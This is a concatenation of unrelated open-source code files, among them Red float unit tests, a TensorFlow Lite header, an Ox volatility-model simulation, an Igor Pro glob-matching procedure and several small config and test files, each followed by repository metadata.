--assertf~= -123456.789 fat-k 1E-4 --test-- "float-auto-1383" fat-i: 123456.789 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= 41152.263 fat-k 1E-4 --test-- "float-auto-1384" fat-i: 123456.789 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= -17636.6841428571 fat-k 1E-4 --test-- "float-auto-1385" fat-i: 123456.789 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= 24691.3578 fat-k 1E-4 --test-- "float-auto-1386" fat-i: 123456.789 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-1387" fat-i: 123456.789 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= 1.01020950696121E-28 fat-k 1E-4 --test-- "float-auto-1388" fat-i: 123456.789 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= 1.23456912456912E+49 fat-k 1E-4 --test-- "float-auto-1389" fat-i: 123456.789 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= 1.60333492207792E-14 fat-k 1E-4 --test-- "float-auto-1390" fat-i: 1.222090944E+33 fat-j: -2147483648.0 fat-k: fat-i / fat-j --assertf~= -5.6908044219017E+23 fat-k 1E-4 --test-- "float-auto-1391" fat-i: 1.222090944E+33 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= 5.69080442455169E+23 fat-k 1E-4 --test-- "float-auto-1392" fat-i: 1.222090944E+33 fat-j: -1.0 fat-k: fat-i / fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1393" fat-i: 1.222090944E+33 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= 4.07363648E+32 fat-k 1E-4 --test-- "float-auto-1394" fat-i: 1.222090944E+33 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= -1.74584420571429E+32 fat-k 1E-4 --test-- "float-auto-1395" fat-i: 1.222090944E+33 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= 2.444181888E+32 fat-k 1E-4 --test-- "float-auto-1396" fat-i: 1.222090944E+33 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= 9.89893673648032E+27 fat-k 1E-4 --test-- "float-auto-1397" fat-i: 1.222090944E+33 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-1398" fat-i: 1.222090944E+33 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= 1.22209216609217E+77 fat-k 1E-4 --test-- "float-auto-1399" fat-i: 1.222090944E+33 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= 158713109610390.0 fat-k 1E-4 --test-- "float-auto-1400" fat-i: 9.99999E-45 fat-j: -2147483648.0 fat-k: fat-i / fat-j --assertf~= -4.65660821646452E-54 fat-k 1E-4 --test-- "float-auto-1401" fat-i: 9.99999E-45 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= 4.65660821863292E-54 fat-k 1E-4 --test-- "float-auto-1402" fat-i: 9.99999E-45 fat-j: -1.0 fat-k: fat-i / fat-j --assertf~= -9.99999E-45 fat-k 1E-4 --test-- "float-auto-1403" fat-i: 9.99999E-45 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= 3.33333E-45 fat-k 1E-4 --test-- "float-auto-1404" fat-i: 9.99999E-45 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= -1.42857E-45 fat-k 1E-4 --test-- "float-auto-1405" fat-i: 9.99999E-45 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= 1.999998E-45 fat-k 1E-4 --test-- "float-auto-1406" fat-i: 9.99999E-45 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= 8.09999197370993E-50 fat-k 1E-4 --test-- "float-auto-1407" fat-i: 9.99999E-45 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= 8.18268889815127E-78 fat-k 1E-4 --test-- "float-auto-1408" fat-i: 9.99999E-45 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-1409" fat-i: 9.99999E-45 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= 1.2987E-63 fat-k 1E-4 --test-- "float-auto-1410" fat-i: 7.7E+18 fat-j: -2147483648.0 fat-k: fat-i / fat-j --assertf~= -3585591912.26959 fat-k 1E-4 --test-- "float-auto-1411" fat-i: 7.7E+18 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= 3585591913.93926 fat-k 1E-4 --test-- "float-auto-1412" fat-i: 7.7E+18 fat-j: -1.0 fat-k: fat-i / fat-j --assertf~= -7.7E+18 fat-k 1E-4 --test-- "float-auto-1413" fat-i: 7.7E+18 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= 2.56666666666667E+18 fat-k 1E-4 --test-- "float-auto-1414" fat-i: 7.7E+18 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= -1.1E+18 fat-k 1E-4 --test-- "float-auto-1415" fat-i: 7.7E+18 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= 1.54E+18 fat-k 1E-4 --test-- "float-auto-1416" fat-i: 7.7E+18 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= 62370000567567.0 fat-k 1E-4 --test-- "float-auto-1417" fat-i: 7.7E+18 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= 6.30067675225323E-15 fat-k 1E-4 --test-- "float-auto-1418" fat-i: 7.7E+18 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= 7.7000077000077E+62 fat-k 1E-4 --test-- "float-auto-1419" fat-i: 7.7E+18 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= 1.0 fat-k 1E-4 ] float-auto-test-func --test-- "float-auto-1420" --assert false = ( 0.0 = -1E-13 ) --test-- "float-auto-1421" --assert true = ( 0.0 = 0.0 ) --test-- "float-auto-1422" --assert false = ( 0.0 = 1E-13 ) --test-- "float-auto-1423" --assert true = ( -2147483648.0 = -2147483648.0 ) --test-- "float-auto-1424" --assert true = ( -2147483648.0 = -2147483648.0 ) --test-- "float-auto-1425" --assert true = ( -2147483648.0 = -2147483648.0 ) --test-- "float-auto-1426" --assert true = ( 2147483647.0 = 2147483647.0 ) --test-- "float-auto-1427" --assert true = ( 2147483647.0 = 2147483647.0 ) --test-- "float-auto-1428" --assert true = ( 2147483647.0 = 2147483647.0 ) --test-- "float-auto-1429" --assert false = ( -1.0 = -1.0000000000001 ) --test-- "float-auto-1430" --assert true = ( -1.0 = -1.0 ) --test-- "float-auto-1431" --assert false = ( -1.0 = -0.9999999999999 ) --test-- "float-auto-1432" --assert false = ( 3.0 = 2.9999999999999 ) --test-- "float-auto-1433" --assert true = ( 3.0 = 3.0 ) --test-- "float-auto-1434" --assert false = ( 3.0 = 3.0000000000001 ) --test-- "float-auto-1435" --assert false = ( -7.0 = -7.0000000000001 ) --test-- "float-auto-1436" --assert true = ( -7.0 = -7.0 ) --test-- "float-auto-1437" --assert false = ( -7.0 = -6.9999999999999 ) --test-- "float-auto-1438" --assert false = ( 5.0 = 4.9999999999999 ) --test-- "float-auto-1439" --assert true = ( 5.0 = 5.0 ) --test-- "float-auto-1440" --assert false = ( 5.0 = 5.0000000000001 ) --test-- "float-auto-1441" --assert true = ( 123456.789 = 123456.789 ) --test-- "float-auto-1442" --assert true = ( 123456.789 = 123456.789 ) --test-- "float-auto-1443" --assert true = ( 123456.789 = 123456.789 ) --test-- "float-auto-1444" --assert true = ( 1.222090944E+33 = 1.222090944E+33 ) --test-- "float-auto-1445" --assert true = ( 1.222090944E+33 = 1.222090944E+33 ) --test-- "float-auto-1446" --assert true = ( 1.222090944E+33 = 1.222090944E+33 ) --test-- "float-auto-1447" --assert false = ( 9.99999E-45 = -1E-13 ) --test-- "float-auto-1448" --assert true = ( 9.99999E-45 = 9.99999E-45 ) --test-- "float-auto-1449" --assert false = ( 9.99999E-45 = 1E-13 ) --test-- "float-auto-1450" --assert true = ( 7.7E+18 = 7.7E+18 ) --test-- "float-auto-1451" --assert true = ( 7.7E+18 = 7.7E+18 ) --test-- "float-auto-1452" --assert true = ( 7.7E+18 = 7.7E+18 ) --test-- "float-auto-1453" --assert true = ( 0.0 <> -1E-13 ) --test-- "float-auto-1454" --assert false = ( 0.0 <> 0.0 ) --test-- "float-auto-1455" --assert true = ( 0.0 <> 1E-13 ) --test-- "float-auto-1456" --assert false = ( -2147483648.0 <> -2147483648.0 ) --test-- "float-auto-1457" --assert false = ( -2147483648.0 <> -2147483648.0 ) --test-- "float-auto-1458" --assert false = ( -2147483648.0 <> -2147483648.0 ) --test-- "float-auto-1459" --assert false = ( 2147483647.0 <> 2147483647.0 ) --test-- "float-auto-1460" --assert false = ( 2147483647.0 <> 2147483647.0 ) --test-- "float-auto-1461" --assert false = ( 2147483647.0 <> 2147483647.0 ) --test-- "float-auto-1462" --assert true = ( -1.0 <> -1.0000000000001 ) --test-- "float-auto-1463" --assert false = ( -1.0 <> -1.0 ) --test-- "float-auto-1464" --assert true = ( -1.0 <> -0.9999999999999 ) --test-- "float-auto-1465" --assert true = ( 3.0 <> 2.9999999999999 ) --test-- "float-auto-1466" --assert false = ( 3.0 <> 3.0 ) --test-- "float-auto-1467" --assert true = ( 3.0 <> 3.0000000000001 ) --test-- "float-auto-1468" --assert true = ( -7.0 <> -7.0000000000001 ) --test-- "float-auto-1469" --assert false = ( -7.0 <> -7.0 ) --test-- "float-auto-1470" --assert true = ( -7.0 <> -6.9999999999999 ) --test-- "float-auto-1471" --assert true = ( 5.0 <> 4.9999999999999 ) --test-- "float-auto-1472" --assert false = ( 5.0 <> 5.0 ) --test-- "float-auto-1473" --assert true = ( 5.0 <> 5.0000000000001 ) --test-- "float-auto-1474" --assert false = ( 123456.789 <> 123456.789 ) --test-- "float-auto-1475" --assert false = ( 123456.789 <> 123456.789 ) --test-- "float-auto-1476" --assert false = ( 123456.789 <> 123456.789 ) --test-- "float-auto-1477" --assert false = ( 1.222090944E+33 <> 1.222090944E+33 ) --test-- "float-auto-1478" --assert false = ( 1.222090944E+33 <> 1.222090944E+33 ) --test-- "float-auto-1479" --assert false = ( 1.222090944E+33 <> 1.222090944E+33 ) --test-- "float-auto-1480" --assert true = ( 9.99999E-45 <> -1E-13 ) --test-- "float-auto-1481" --assert false = ( 9.99999E-45 <> 9.99999E-45 ) --test-- "float-auto-1482" --assert true = ( 9.99999E-45 <> 1E-13 ) --test-- "float-auto-1483" --assert false = ( 7.7E+18 <> 7.7E+18 ) --test-- "float-auto-1484" --assert false = ( 7.7E+18 <> 7.7E+18 ) --test-- "float-auto-1485" --assert false = ( 7.7E+18 <> 7.7E+18 ) --test-- "float-auto-1486" --assert false = ( 0.0 < -1E-13 ) --test-- "float-auto-1487" --assert false = ( 0.0 < 0.0 ) --test-- "float-auto-1488" --assert true = ( 0.0 < 1E-13 ) --test-- "float-auto-1489" --assert false = ( -2147483648.0 < -2147483648.0 ) --test-- "float-auto-1490" --assert false = ( -2147483648.0 < -2147483648.0 ) --test-- "float-auto-1491" --assert false = ( -2147483648.0 < -2147483648.0 ) --test-- "float-auto-1492" --assert false = ( 2147483647.0 < 2147483647.0 ) --test-- "float-auto-1493" --assert false = ( 2147483647.0 < 2147483647.0 ) --test-- "float-auto-1494" --assert false = ( 2147483647.0 < 2147483647.0 ) --test-- "float-auto-1495" --assert false = ( -1.0 < -1.0000000000001 ) --test-- "float-auto-1496" --assert false = ( -1.0 < -1.0 ) --test-- "float-auto-1497" --assert true = ( -1.0 < -0.9999999999999 ) --test-- "float-auto-1498" --assert false = ( 3.0 < 2.9999999999999 ) --test-- "float-auto-1499" --assert false = ( 3.0 < 3.0 ) --test-- "float-auto-1500" --assert true = ( 3.0 < 3.0000000000001 ) --test-- "float-auto-1501" --assert false = ( -7.0 < -7.0000000000001 ) --test-- "float-auto-1502" --assert false = ( -7.0 < -7.0 ) --test-- "float-auto-1503" --assert true = ( -7.0 < -6.9999999999999 ) --test-- "float-auto-1504" --assert false = ( 5.0 < 4.9999999999999 ) --test-- "float-auto-1505" --assert false = ( 5.0 < 5.0 ) --test-- "float-auto-1506" --assert true = ( 5.0 < 5.0000000000001 ) --test-- "float-auto-1507" --assert false = ( 123456.789 < 123456.789 ) --test-- "float-auto-1508" --assert false = ( 123456.789 < 123456.789 ) --test-- "float-auto-1509" --assert false = ( 123456.789 < 123456.789 ) --test-- "float-auto-1510" --assert false = ( 1.222090944E+33 < 1.222090944E+33 ) --test-- "float-auto-1511" --assert false = ( 1.222090944E+33 < 1.222090944E+33 ) --test-- "float-auto-1512" --assert false = ( 1.222090944E+33 < 1.222090944E+33 ) --test-- "float-auto-1513" --assert false = ( 9.99999E-45 < -1E-13 ) --test-- "float-auto-1514" --assert false = ( 9.99999E-45 < 9.99999E-45 ) --test-- "float-auto-1515" --assert true = ( 9.99999E-45 < 1E-13 ) --test-- "float-auto-1516" --assert false = ( 7.7E+18 < 7.7E+18 ) --test-- "float-auto-1517" --assert false = ( 7.7E+18 < 7.7E+18 ) --test-- "float-auto-1518" --assert false = ( 7.7E+18 < 7.7E+18 ) --test-- "float-auto-1519" --assert true = ( 0.0 > -1E-13 ) --test-- "float-auto-1520" --assert false = ( 0.0 > 0.0 ) --test-- "float-auto-1521" --assert false = ( 0.0 > 1E-13 ) --test-- "float-auto-1522" --assert false = ( -2147483648.0 > -2147483648.0 ) --test-- "float-auto-1523" --assert false = ( -2147483648.0 > -2147483648.0 ) --test-- "float-auto-1524" --assert false = ( -2147483648.0 > -2147483648.0 ) --test-- "float-auto-1525" --assert false = ( 2147483647.0 > 2147483647.0 ) --test-- "float-auto-1526" --assert false = ( 2147483647.0 > 2147483647.0 ) --test-- "float-auto-1527" --assert false = ( 2147483647.0 > 2147483647.0 ) --test-- "float-auto-1528" --assert true = ( -1.0 > -1.0000000000001 ) --test-- "float-auto-1529" --assert false = ( -1.0 > -1.0 ) --test-- "float-auto-1530" --assert false = ( -1.0 > -0.9999999999999 ) --test-- "float-auto-1531" --assert true = ( 3.0 > 2.9999999999999 ) --test-- "float-auto-1532" --assert false = ( 3.0 > 3.0 ) --test-- "float-auto-1533" --assert false = ( 3.0 > 3.0000000000001 ) --test-- "float-auto-1534" --assert true = ( -7.0 > -7.0000000000001 ) --test-- "float-auto-1535" --assert false = ( -7.0 > -7.0 ) --test-- "float-auto-1536" --assert false = ( -7.0 > -6.9999999999999 ) --test-- "float-auto-1537" --assert true = ( 5.0 > 4.9999999999999 ) --test-- "float-auto-1538" --assert false = ( 5.0 > 5.0 ) --test-- "float-auto-1539" --assert false = ( 5.0 > 5.0000000000001 ) --test-- "float-auto-1540" --assert false = ( 123456.789 > 123456.789 ) --test-- "float-auto-1541" --assert false = ( 123456.789 > 123456.789 ) --test-- "float-auto-1542" --assert false = ( 123456.789 > 123456.789 ) --test-- "float-auto-1543" --assert false = ( 1.222090944E+33 > 1.222090944E+33 ) --test-- "float-auto-1544" --assert false = ( 1.222090944E+33 > 1.222090944E+33 ) --test-- "float-auto-1545" --assert false = ( 1.222090944E+33 > 1.222090944E+33 ) --test-- "float-auto-1546" --assert true = ( 9.99999E-45 > -1E-13 ) --test-- "float-auto-1547" --assert false = ( 9.99999E-45 > 9.99999E-45 ) --test-- "float-auto-1548" --assert false = ( 9.99999E-45 > 1E-13 ) --test-- "float-auto-1549" --assert false = ( 7.7E+18 > 7.7E+18 ) --test-- "float-auto-1550" --assert false = ( 7.7E+18 > 7.7E+18 ) --test-- "float-auto-1551" --assert false = ( 7.7E+18 > 7.7E+18 ) --test-- "float-auto-1552" --assert true = ( 0.0 >= -1E-13 ) --test-- "float-auto-1553" --assert true = ( 0.0 >= 0.0 ) --test-- "float-auto-1554" --assert false = ( 0.0 >= 1E-13 ) --test-- "float-auto-1555" --assert true = ( -2147483648.0 >= -2147483648.0 ) --test-- "float-auto-1556" --assert true = ( -2147483648.0 >= -2147483648.0 ) --test-- "float-auto-1557" --assert true = ( -2147483648.0 >= -2147483648.0 ) --test-- "float-auto-1558" --assert true = ( 2147483647.0 >= 2147483647.0 ) --test-- "float-auto-1559" --assert true = ( 2147483647.0 >= 2147483647.0 ) --test-- "float-auto-1560" --assert true = ( 2147483647.0 >= 2147483647.0 ) --test-- "float-auto-1561" --assert true = ( -1.0 >= -1.0000000000001 ) --test-- "float-auto-1562" --assert true = ( -1.0 >= -1.0 ) --test-- "float-auto-1563" --assert false = ( -1.0 >= -0.9999999999999 ) --test-- "float-auto-1564" --assert true = ( 3.0 >= 2.9999999999999 ) --test-- "float-auto-1565" --assert true = ( 3.0 >= 3.0 ) --test-- "float-auto-1566" --assert false = ( 3.0 >= 3.0000000000001 ) --test-- "float-auto-1567" --assert true = ( -7.0 >= -7.0000000000001 ) --test-- "float-auto-1568" --assert true = ( -7.0 >= -7.0 ) --test-- "float-auto-1569" --assert false = ( -7.0 >= -6.9999999999999 ) --test-- "float-auto-1570" --assert true = ( 5.0 >= 4.9999999999999 ) --test-- "float-auto-1571" --assert true = ( 5.0 >= 5.0 ) --test-- "float-auto-1572" --assert false = ( 5.0 >= 5.0000000000001 ) --test-- "float-auto-1573" --assert true = ( 123456.789 >= 123456.789 ) --test-- "float-auto-1574" --assert true = ( 123456.789 >= 123456.789 ) --test-- "float-auto-1575" --assert true = ( 123456.789 >= 123456.789 ) --test-- "float-auto-1576" --assert true = ( 1.222090944E+33 >= 1.222090944E+33 ) --test-- "float-auto-1577" --assert true = ( 1.222090944E+33 >= 1.222090944E+33 ) --test-- "float-auto-1578" --assert true = ( 1.222090944E+33 >= 1.222090944E+33 ) --test-- "float-auto-1579" --assert true = ( 9.99999E-45 >= -1E-13 ) --test-- "float-auto-1580" --assert true = ( 9.99999E-45 >= 9.99999E-45 ) --test-- "float-auto-1581" --assert false = ( 9.99999E-45 >= 1E-13 ) --test-- "float-auto-1582" --assert true = ( 7.7E+18 >= 7.7E+18 ) --test-- "float-auto-1583" --assert true = ( 7.7E+18 >= 7.7E+18 ) --test-- "float-auto-1584" --assert true = ( 7.7E+18 >= 7.7E+18 ) --test-- "float-auto-1585" --assert false = ( 0.0 <= -1E-13 ) --test-- "float-auto-1586" --assert true = ( 0.0 <= 0.0 ) --test-- "float-auto-1587" --assert true = ( 0.0 <= 1E-13 ) --test-- "float-auto-1588" --assert true = ( -2147483648.0 <= -2147483648.0 ) --test-- "float-auto-1589" --assert true = ( -2147483648.0 <= -2147483648.0 ) --test-- "float-auto-1590" --assert true = ( -2147483648.0 <= -2147483648.0 ) --test-- "float-auto-1591" --assert true = ( 2147483647.0 <= 2147483647.0 ) --test-- "float-auto-1592" --assert true = ( 2147483647.0 <= 2147483647.0 ) --test-- "float-auto-1593" --assert true = ( 2147483647.0 <= 2147483647.0 ) --test-- "float-auto-1594" --assert false = ( -1.0 <= -1.0000000000001 ) --test-- "float-auto-1595" --assert true = ( -1.0 <= -1.0 ) --test-- "float-auto-1596" --assert true = ( -1.0 <= -0.9999999999999 ) --test-- "float-auto-1597" --assert false = ( 3.0 <= 2.9999999999999 ) --test-- "float-auto-1598" --assert true = ( 3.0 <= 3.0 ) --test-- "float-auto-1599" --assert true = ( 3.0 <= 3.0000000000001 ) --test-- "float-auto-1600" --assert false = ( -7.0 <= -7.0000000000001 ) --test-- "float-auto-1601" --assert true = ( -7.0 <= -7.0 ) --test-- "float-auto-1602" --assert true = ( -7.0 <= -6.9999999999999 ) --test-- "float-auto-1603" --assert false = ( 5.0 <= 4.9999999999999 ) --test-- "float-auto-1604" --assert true = ( 5.0 <= 5.0 ) --test-- "float-auto-1605" --assert true = ( 5.0 <= 5.0000000000001 ) --test-- "float-auto-1606" --assert true = ( 123456.789 <= 123456.789 ) --test-- "float-auto-1607" --assert true = ( 123456.789 <= 123456.789 ) --test-- "float-auto-1608" --assert true = ( 123456.789 <= 123456.789 ) --test-- "float-auto-1609" --assert true = ( 1.222090944E+33 <= 1.222090944E+33 ) --test-- "float-auto-1610" --assert true = ( 1.222090944E+33 <= 1.222090944E+33 ) --test-- "float-auto-1611" --assert true = ( 1.222090944E+33 <= 1.222090944E+33 ) --test-- "float-auto-1612" --assert false = ( 9.99999E-45 <= -1E-13 ) --test-- "float-auto-1613" --assert true = ( 9.99999E-45 <= 9.99999E-45 ) --test-- "float-auto-1614" --assert true = ( 9.99999E-45 <= 1E-13 ) --test-- "float-auto-1615" --assert true = ( 7.7E+18 <= 7.7E+18 ) --test-- "float-auto-1616" --assert true = ( 7.7E+18 <= 7.7E+18 ) --test-- "float-auto-1617" --assert true = ( 7.7E+18 <= 7.7E+18 ) ===end-group=== ~~~end-file~~~
Red
5
GalenIvanov/red
system/tests/source/units/float-test.reds
[ "BSL-1.0", "BSD-3-Clause" ]
/* Copyright 2021 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ==============================================================================*/ #ifndef TENSORFLOW_LITE_EXPERIMENTAL_ACCELERATION_MINI_BENCHMARK_JPEG_COMMON_H_ #define TENSORFLOW_LITE_EXPERIMENTAL_ACCELERATION_MINI_BENCHMARK_JPEG_COMMON_H_ #include "tensorflow/lite/experimental/acceleration/mini_benchmark/libjpeg.h" namespace tflite { namespace acceleration { namespace decode_jpeg_kernel { struct JpegHeader { int height; int width; int channels; int bits_per_sample = BITS_IN_JSAMPLE; }; } // namespace decode_jpeg_kernel } // namespace acceleration } // namespace tflite #endif // TENSORFLOW_LITE_EXPERIMENTAL_ACCELERATION_MINI_BENCHMARK_JPEG_COMMON_H_
C
3
EricRemmerswaal/tensorflow
tensorflow/lite/experimental/acceleration/mini_benchmark/jpeg_common.h
[ "Apache-2.0" ]
#include <oxstd.h> #include <oxdraw.h> #include <oxprob.h> #include <maximize.h> #import <modelbase> #import <simula> #include <oxfloat.h> static decl iB; //Repeats static decl iSIZE; //Size of time series static decl iSTEPS; //#Steps to divide the size static decl iSIMS; //# of Zt ~ N(0,1) static decl iPLOT; static decl iDIST; static decl dALPHA; static decl dBETA; static decl dOMEGA; static decl dGAMMA; static decl iPARS; //number of parameters static decl vSTD_ALD; // Zt ~ ALD(0, b, p) static decl s_vY; //Simulated returns //static decl bSTD_ERROR; //0 or 1 boalean findicator(const vX){ decl vReturn, iN; iN = sizerc(vX); if(rows(vX)!=1){ vReturn = zeros(iN,1); }else{ vReturn = zeros(1,iN); } // print(vReturn); for(decl i=0;i<iN;i++){ if(vX[i]<=0){ vReturn[i]=1; } } return vReturn; } fSimALGAS(const dAlpha, const dBeta, const dOmega, const dGamma, const dP, const avReturns){ decl vTemp, vH; vTemp = vH = zeros(iSIZE+1, 1); vH[0]= dGamma; //by definition for(decl i = 0; i < iSIZE; i++){ vTemp[i] = sqrt(vH[i])*vSTD_ALD[i]; vH[i+1] = dOmega + dBeta*vH[i] + dAlpha*((dP-findicator(vTemp[i]))*(2*sqrt(1-2*dP+2*sqr(dP))/((1-dP)*dP))*vTemp[i]*sqrt(vH[i])-2*vH[i]) ; } vTemp = dropr(vTemp,iSIZE); vH = dropr(vH,iSIZE); avReturns[0] = vH; return 1; } main() { decl vRanExp, vRanExp2, vRanBern, vRanALD, vRanN; decl dB; //dB > 0 decl dP; //0 < dP < 1 dB = 1; dP = 0.3; iDIST = 10000000; iSIZE = 1000; iPLOT = 1000; vRanExp = ranexp(iDIST, 1, 1); vRanExp2 = ranexp(iDIST, 1, 1); // vRanBern = ranbinomial(iDIST, 1, 1, dP); vRanALD = vRanExp/dP-vRanExp2/(1-dP); //~ALD(0,1,p) vRanALD = dB*vRanALD; //~ALD(0,b,p) vSTD_ALD = (1-dP)*dP/(dB*sqrt(1-2*dP+2*sqr(dP)))*vRanALD; print(variance(vSTD_ALD)); vRanN = rann(iDIST,1); decl vReturns; fSimALGAS(0.1, 0.99, 0.01, 0.1, 0.45, &vReturns); //print(vReturns); SetDrawWindow("0_SIM_asymmetric_laplace-GAS"); DrawDensity(0, (vRanN)', {"Density zt~ N(0,1)"}); DrawDensity(0, (vSTD_ALD)', {"Density zt~ st_ALD(0,b,p)"}); Draw(1, (vSTD_ALD[0:iPLOT])'); Draw(2, (vReturns)'); ShowDrawWindow(); //print(vRanALD); }
Ox
3
tamerdilaver/Simulation_al-GAS
simulate_al-GAS.ox
[ "MIT" ]
- if can?(current_user, :read_pipeline, merge_request.head_pipeline) %li.issuable-pipeline-status.d-none.d-sm-flex = render 'ci/status/icon', status: merge_request.head_pipeline.detailed_status(current_user), option_css_classes: 'd-flex'
Haml
2
glimmerhq/glimmerhq
app/views/shared/_merge_request_pipeline_status.html.haml
[ "MIT" ]
package jadx.api.plugins; public interface JadxPlugin { JadxPluginInfo getPluginInfo(); }
Java
3
mazhidong/jadx
jadx-plugins/jadx-plugins-api/src/main/java/jadx/api/plugins/JadxPlugin.java
[ "Apache-2.0" ]
abstract class Obj { type S } class ObjImpl extends Obj { type S = String } abstract class A { type MyObj <: Obj type S = MyObj#S val any: Any = 0 val some: S = any // compiles => type X is set to scala.Any } class B extends A { type MyObj = ObjImpl val myString: S = "hello" val realString: String = myString // error: type mismatch }
Scala
3
jamesanto/scala
test/files/neg/t836.scala
[ "Apache-2.0" ]
spring.mobile.devicedelegatingviewresolver.enabled: true spring.freemarker.template-loader-path: classpath:/templates spring.freemarker.suffix: .ftl
INI
2
DBatOWL/tutorials
spring-mobile/src/main/resources/application.properties
[ "MIT" ]
rule_files: - 'first.rules' - 'rules\second.rules' - 'c:\absolute\third.rules'
YAML
2
smthkissinger/docker-images
monitoring/prometheus/busybox-prometheus/config/testdata/rules_abs_path_windows.good.yml
[ "BSD-3-Clause" ]
#pragma rtGlobals=3 // Use modern global access method and strict wave access. #pragma ModuleName = glob #pragma version = 0.1 Function/WAVE glob(pattern) String pattern if(StringMatch(pattern, "root:*")) // absolute path WAVE/T buffer = glob_("root:", pattern[5, inf]) elseif(StringMatch(pattern, ":*")) // relative path (beginning with :) WAVE/T buffer = glob_(":", pattern[1, inf]) else // relative path (others) WAVE/T buffer = glob_("", pattern) buffer = (buffer)[1, inf] // glob_ adds : to represent a relative path endif // glob does not add ending : for folders unless the user adds : if(StringMatch(pattern "*:")) buffer = RemoveEnding(buffer, ":") + ":" endif return buffer End // Returns a text wave containing matched pathnames static Function/WAVE glob_(root, pattern) String root // a relative or absolute pathname as a root String pattern // a maching pattern using * or ** // the root pathname must end with : root = RemoveEnding(root, ":") + ":" Make/FREE/T/N=0 buffer // leaf / inner node of matching algorithm if(ItemsInList(pattern, ":") < 2) // leaf node of matching algorithm // data folder only or not if(StringMatch(pattern, "*:")) Concatenate/T/NP {MatchedFolders(root, RemoveEnding(pattern, ":"))}, buffer else Concatenate/T/NP {MatchedObjects(root, pattern), MatchedFolders(root, pattern)}, buffer endif else // inner node of matching algorithm // refers a parent folder (using ::) or not if(StringMatch(pattern, ":*")) // matching with a parent path root += SelectString(StringMatch(root, "root:"), ":", "") // the root of root: is root: itself Concatenate/T/NP {glob_(root, pattern[1, inf])}, buffer else // matching recursively WAVE/T folders = MatchedFolders(root, StringFromList(0, pattern, ":")) Variable i for(i = 0; i < DimSize(folders, 0); i += 1) Concatenate/T/NP {glob_(folders[i], pattern[strsearch(pattern, ":", 0)+1, inf])}, buffer endfor endif endif // global matching pattern ** is equivalent to *:** if(strsearch(StringFromList(0, pattern, ":"), "**", 0) >= 0) Concatenate/T/NP {glob_(root, ReplaceString("**", pattern, "*:**", 0, 1))}, buffer endif return buffer End static Function/WAVE MatchedFolders(root, pattern) String root, pattern root = RemoveEnding(root, ":") + ":" Make/FREE/T/N=(DataFolderExists(root) ? CountObjects(root, 4) : 0) folders = PossiblyQuoteName(GetIndexedObjName(root, 4, p)) Extract/T/O folders, folders, Match(folders, pattern) folders = root + folders return folders End static Function/WAVE MatchedObjects(root, pattern) String root, pattern root = RemoveEnding(root, ":") + ":" Make/FREE/T/N=(DataFolderExists(root) ? CountObjects(root, 1) : 0) wavs = GetIndexedObjName(root, 1, p) Make/FREE/T/N=(DataFolderExists(root) ? CountObjects(root, 2) : 0) vars = GetIndexedObjName(root, 2, p) Make/FREE/T/N=(DataFolderExists(root) ? CountObjects(root, 3) : 0) strs = GetIndexedObjName(root, 3, p) Make/FREE/T/N=0 objects Concatenate/T/NP {wavs, vars, strs}, objects Extract/T/O objects, objects, Match(objects, pattern) objects = root + objects return objects End static Function Match(str, pattern) String str, pattern // A pattern matches both of normal a name and a free name. // For example, "*1" matches both of "folder1" and "'folder 1'" // // If a pattern is beginning with !, the return value of StringMatch is reveresed. // Because ! has no meaning for the pathname-matching, compare (" " + str) with (" " + pattern) here. if(StringMatch(str, "'*'")) return StringMatch(" " + RemoveEnding(str[1, inf], "'"), " " + pattern) || StringMatch(" " + str, " " + pattern) else return StringMatch(" " + str, " " + pattern) endif End
IGOR Pro
5
ajnavarro/language-dataset
data/github.com/ryotako/igor-glob/b02ebfb0c6c621a1f97d1bd38c5aafab089658a5/glob.ipf
[ "MIT" ]
